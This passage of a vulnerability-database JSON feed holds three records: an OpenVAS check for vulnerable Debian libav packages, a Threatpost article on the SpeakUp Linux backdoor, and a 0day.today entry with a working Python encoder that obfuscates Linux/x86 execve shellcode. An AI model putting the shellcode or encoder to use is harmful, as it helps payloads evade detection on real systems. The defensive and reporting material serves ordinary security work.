script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\\.[0-9]+\");\n script_tag(name:\"affected\", value:\"libav on Debian Linux\");\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these problems have been fixed in version\n6:11.12-1~deb8u5.\n\nWe recommend that you upgrade your libav packages.\");\n script_tag(name:\"summary\", value:\"Several security issues have been corrected in multiple demuxers and\ndecoders of the libav multimedia library.\n\nCVE-2014-8542\n\nlibavcodec/utils.c omitted a certain codec ID during enforcement of\nalignment, which allowed remote 
attackers to cause a denial of service\n(out-of-bounds access) or possibly have unspecified other impact via\ncrafted JV data.\n\nCVE-2015-1207\n\nDouble-free vulnerability in libavformat/mov.c allowed remote\nattackers to cause a denial of service (memory corruption and crash)\nvia a crafted .m4a file.\n\nCVE-2017-7863\n\nlibav had an out-of-bounds write caused by a heap-based buffer\noverflow related to the decode_frame_common function in\nlibavcodec/pngdec.c.\n\nCVE-2017-7865\n\nlibav had an out-of-bounds write caused by a heap-based buffer\noverflow related to the ipvideo_decode_block_opcode_0xA function in\nlibavcodec/interplayvideo.c and the avcodec_align_dimensions2\nfunction in libavcodec/utils.c.\n\nCVE-2017-14169\n\nIn the mxf_read_primer_pack function in libavformat/mxfdec.c in, an\ninteger signedness error might have occurred when a crafted file,\nclaiming a large 'item_num' field such as 0xffffffff, was provided.\nAs a result, the variable 'item_num' turned negative, bypassing the\ncheck for a large value.\n\nCVE-2017-14223\n\nIn libavformat/asfdec_f.c a DoS in asf_build_simple_index() due to\nlack of an EOF (End of File) check might have caused huge CPU\nconsumption. 
When a crafted ASF file, claiming a large 'ict' field in\nthe header but not containing sufficient backing data, was provided,\nthe for loop would have consumed huge CPU and memory resources, since\nthere was no EOF check inside the loop.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libav-dbg\", ver:\"6:11.12-1~deb8u5\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libav-doc\", ver:\"6:11.12-1~deb8u5\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libav-tools\", ver:\"6:11.12-1~deb8u5\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libavcodec-dev\", ver:\"6:11.12-1~deb8u5\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libavcodec-extra\", ver:\"6:11.12-1~deb8u5\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libavcodec-extra-56\", ver:\"6:11.12-1~deb8u5\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libavcodec56\", ver:\"6:11.12-1~deb8u5\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libavdevice-dev\", ver:\"6:11.12-1~deb8u5\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libavdevice55\", ver:\"6:11.12-1~deb8u5\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libavfilter-dev\", ver:\"6:11.12-1~deb8u5\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += 
res;\n}\nif ((res = isdpkgvuln(pkg:\"libavfilter5\", ver:\"6:11.12-1~deb8u5\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libavformat-dev\", ver:\"6:11.12-1~deb8u5\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libavformat56\", ver:\"6:11.12-1~deb8u5\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libavresample-dev\", ver:\"6:11.12-1~deb8u5\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libavresample2\", ver:\"6:11.12-1~deb8u5\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libavutil-dev\", ver:\"6:11.12-1~deb8u5\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libavutil54\", ver:\"6:11.12-1~deb8u5\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libswscale-dev\", ver:\"6:11.12-1~deb8u5\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libswscale3\", ver:\"6:11.12-1~deb8u5\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "zdt": [{"lastseen": "2019-02-06T09:02:58", "bulletinFamily": "exploit", "description": "Exploit for linux/x86 platform in category shellcode", "modified": "2019-02-05T00:00:00", "published": "2019-02-05T00:00:00", "id": "1337DAY-ID-32134", "href": "https://0day.today/exploit/description/32134", "title": "Linux/x86 - Random Insertion Encoder and Decoder Shellcode (Generator)", "type": "zdt", "sourceData": 
"#!/usr/bin/python\r\n# Python Random Insertion Encoder\r\n# Author: Aditya Chaudhary\r\n# Date: 5th Feb 2019\r\n\r\n\r\nimport random\r\nimport sys\r\nimport argparse\r\n\r\nshellcode = (\"\\x31\\xc0\\x50\\x89\\xe2\\x68\\x62\\x61\\x73\\x68\\x68\\x62\\x69\\x6e\\x2f\\x68\\x2f\\x2f\\x2f\\x2f\\x89\\xe3\\x50\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\")\r\n\r\n# Parse Arguments\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument(\"-e\", \"--entropy\", help=\"Entropy of random byted to be inserted after each shellcode byte (use a value between 1 & 10)\", type=int)\r\nparser.add_argument(\"-b\", \"--badchars\", help=\"Badchars to removed from inserted bytes\", type=str)\r\nargs = parser.parse_args()\r\n\r\n\r\nencoded = \"\"\r\nencoded2 = \"\"\r\n\r\n\r\nentropy = args.entropy\r\nbad_chars = args.badchars\r\n#print len(sys.argv)\r\n#if len(sys.argv) > 1:\r\n#\tentropy = int(sys.argv[1])\r\n\r\nprint '[#] Using Entropy: %s (inserting 1 to %s random number of bytes)'%(entropy, entropy)\r\n\r\n#if len(sys.argv) < 3:\r\n#\tprint '[#] No Bad characters provided'\r\n#else:\r\n#\tbad_chars = str(sys.argv[2])\r\nbad_chars = bad_chars.split(',')\r\nprint '[#] Bad chars: %s'%(bad_chars)\r\n\r\n# Generate byte string from \\x01 to \\xff\r\nchars = []\r\nfor o in range(256):\r\n #print(hex(o))\r\n\tch = '%02x' % o\r\n\tif ch not in bad_chars:\r\n\t\tchars.append(ch)\r\n\r\n\r\nprint '[#] Generating Shellcode...'\r\n\r\nrepeat = 0\r\n\r\nfor x in bytearray(shellcode) :\r\n\trepeat = random.randint(1, entropy)\r\n\t#print \"[#]\"+str(repeat)\r\n\tencoded += '\\\\x'\r\n\tencoded += '%02x' % x\r\n\tencoded += '\\\\x'\r\n\tencoded += '%02x'% repeat\r\n\r\n\tencoded2 += '0x'\r\n\tencoded2 += '%02x,' % x\r\n\tencoded2 += '0x'\r\n\tencoded2 += '%02x,' % repeat\r\n\r\n\ten_byte = \"\"\r\n\tfor i in range(1, repeat+1):\r\n\t\t# print i\r\n\t\ten_byte = chars[random.randint(0, len(chars)-1)]\r\n\r\n\t\tencoded += '\\\\x%s' % en_byte\r\n\t\t# encoded += '\\\\x%02x' % 
random.randint(1,255)\r\n\t\tencoded2 += '0x%s,' % en_byte\r\n\t\t# encoded2 += '0x%02x,' % random.randint(1,255)\r\n\t#encoded += '\\n'\r\n\r\n\r\nprint '[#] Encoded shellcode:'\r\n\r\nprint encoded\r\nprint encoded2\r\n\r\nprint '[#] Shellcode Length: %d' % len(bytearray(shellcode))\r\nprint '[#] Encoded Shellcode Length: %d' % encoded.count('x')\n\n# 0day.today [2019-02-06] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32134"}], "threatpost": [{"lastseen": "2019-02-04T19:46:57", "bulletinFamily": "info", "description": "LAS VEGAS \u2014 A backdoor trojan dubbed \u201cSpeakUp\u201d has been spotted exploiting the Linux servers that run more than 90 percent of the top 1 million domains in the U.S. It uses a complex bag of tricks to infect hosts and to propagate, which analysts say could indicate that it\u2019s poised for a major offensive involving a vast number of infected hosts, potentially worldwide.\n\nAccording to Check Point research released Monday at the CPX360 event in Las Vegas, SpeakUp (so-named after its command-and-control domain, SpeakUpOmaha[dot]com) is being used in a cryptomining campaign that is gaining momentum and has targeted more than 70,000 servers worldwide so far in what could be the foundation for a very formidable botnet.\n\nSpeakUp targets on-premises servers as well as cloud-based machines, such as those hosted by Amazon Web Services; and, it doesn\u2019t stop at Linux: It also has the ability to infect MacOS devices.\n\nOded Vanunu, head of products vulnerability research for Check Point, told Threatpost that the scope of this attack includes all servers running ThinkPHP, Hadoop Yarn, Oracle WebLogic, Apache ActiveMQ and Red Hat JBoss. 
And, he said that since this software can be deployed on virtual servers, all cloud infrastructure is also prone to being affected.\n\nThe actual trojan itself can affect all Linux distributions and MacOS.\n\n## Infection Routine\n\nThe initial infection vector starts with targeting a recently reported RCE vulnerability in ThinkPHP (CVE-2018-20062); the code uses command-injection techniques for uploading a PHP shell that serves and executes a Perl backdoor.\n\nThe routine is heavily obfuscated: Using a GET request, exploit code is sent to the targeted server. The resulting uploaded PHP shell then sends another HTTP request to the targeted server, with a standard injection function that pulls the ibus payload and stores it. The payload execution is then kicked off using an additional HTTP request. That executes the Perl script, puts it to sleep for two seconds and deletes the file to remove any evidence of infection.\n\nCheck Point analysts found that, after registering the victim machine with the C2, SpeakUp continuously asks for new tasks at a fixed interval of every three seconds. The C2 can say \u201cno task\u201d \u2013 or, it can tell it to execute arbitrary code on the local machine, download and execute a file from any remote server, kill or uninstall the program, or send updated fingerprint data.\n\n\u201cThe beauty is that the threat actor has a foothold on any infected server,\u201d Vanunu said. \u201cWhich means he can adapt new future vulnerabilities, and deploy the new code, which will attempt exploit further using new techniques. 
If the threat actor decides to implement some more infection techniques the number of bots could easily scale up.\u201d\n\nThe campaign would be immediately scaled as well, since a threat actor would be able to download a piece of malware to all infected hosts at once.\n\n\u201cThe infected hosts are checking the C2 server for new commands every three minutes,\u201d said Vanunu.\n\n\u201cThe threat actor [may also be able to] sell the infected hosts to any threat actor and deploy any type of malware to the highest bidder,\u201d he added.\n\n## Highly Sophisticated Propagation\n\nSpeakUp also comes equipped with a handy propagation script written in Python; its main functions are brute-forcing administrative panels using a pre-defined list of usernames and passwords; and scanning the network environment of the infected machine. For the latter function, it checks for availability of specific ports on servers that share the same internal and external subnet mask. The idea is to scan and infect more vulnerable Linux servers within its internal and external subnets, using a full bag of exploits.\n\nTo spread, SpeakUp\u2019s propagation code exploits known vulnerabilities in six different Linux distributions, including JBoss Enterprise Application Platform security bypass vulnerabilities (CVE-2012-0874); a JBoss Seam Framework remote code execution (RCE) flaw (CVE-2010-1871); a JBoss AS 3/4/5/6 RCE exploit; an Oracle WebLogic wls-wsat Component Deserialization RCE (CVE-2017-10271); a vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (CVE-2018-2894); a Hadoop YARN ResourceManager command-execution exploit; and an Apache ActiveMQ Fileserver File Upload RCE vulnerability (CVE-2016-3088).\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/01154122/SpeakUp-Infection-Rate.png>)\n\nSpeakUp\u2019s daily infection rate\n\n\u201cA successful exploitation of one of the vulnerabilities will result in deploying 
the original ibus script on the exploited server,\u201d according to Check Point\u2019s analysis, which added that it also has the capability to infect Macs.\n\n## A Bigger Threat in the Making?\n\nRight now, the observed file downloads that the backdoor is dropping are simple Monero-mining scripts. However, SpeakUp\u2019s authors have the ability to download any code they want to the servers. Check Point analysts said that the mining code could be a sort of beta test ahead of a much more concerning malware drop to come.\n\n\u201cAt the moment SpeakUp serves XMRig miners to its listening infected servers,\u201d according to the research. According to [XMRHunter,](<https://www.xmrhunter.com/>) the wallets hold a total of around 107 Monero coins right now, which is small potatoes in the grand scheme of things.\n\n\u201cSpeakUp\u2019s obfuscated payloads and propagation technique is beyond any doubt the work of a bigger threat in the making,\u201d according to the analysis. \u201cIt is hard to imagine anyone would build such a compound array of payloads just to deploy few miners. The threat actor behind this campaign can at any given time deploy additional payloads, potentially more intrusive and offensive. It has the ability to scan the surrounding network of an infected server and distribute the malware.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/01153817/SpeakUp-VT.png>)\n\nSpeakUp has no detections in VirusTotal.\n\nThe initial victims have been in Eastern Asia and Latin America, but researchers believe that the U.S. could be the next target, if not the rest of the world. 
Given the impressive propagation tactics, a non-existent detection rate on VirusTotal, and the fact that the threat surface contains servers that run the top sites on the internet, SpeakUp could end up being a very big deal, researchers said: \u201cThis campaign, while still relatively new, can evolve into something bigger and potentially more harmful\u2026[and] at the time of writing this article, it has no detections in VirusTotal.\u201d\n\n## Attribution\n\nWhile the exact identity of the threat actor behind this new attack is still unconfirmed, it\u2019s clear that it\u2019s someone or a group with plenty of malware-authoring chops.\n\n\u201cWhile currently we\u2019ve spotted a cryptocurrency mining payload, the most notable aspect is the spreading abilities demonstrated in the code,\u201d Vanunu told Threatpost. \u201cNot only this was highly obfuscated, the variety of exploits used could potentially mean we have a highly skilled threat actor behind it.\u201d\n\nCheck Point researchers were able to correlate SpeakUp\u2019s author with a possibly Russian-speaking malware developer under the name of Zettabit.\n\n\u201cAlthough SpeakUp is implemented differently [than Zettabit\u2019s other code], it has a lot in common with Zettabit\u2019s craftsmanship,\u201d according to the analysis.\n\nIn terms of what links Zettabit to this malware, \u201cwe\u2019ve read all of his Hack Forums posts and Github projects, so this avatar definitely knows his way around botnets,\u201d Vanunu told Threatpost. \u201cHe even released a free example of botnet code for anyone to use. And while researching, we\u2019ve identified two unique strings that were mentioned and used by Zettabit himself a couple of times in the past.\u201d\n\n_This story was updated at 2:23 p.m. ET on February 4 to reflect additional details from the researchers. 
_\n", "modified": "2019-02-04T09:00:15", "published": "2019-02-04T09:00:15", "id": "THREATPOST:260D48C8E6CF572D5CE165F85C7265E6", "href": "https://threatpost.com/speakup-linux-backdoor/141431/", "type": "threatpost", "title": "SpeakUp Linux Backdoor Sets Up for Major Attack", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}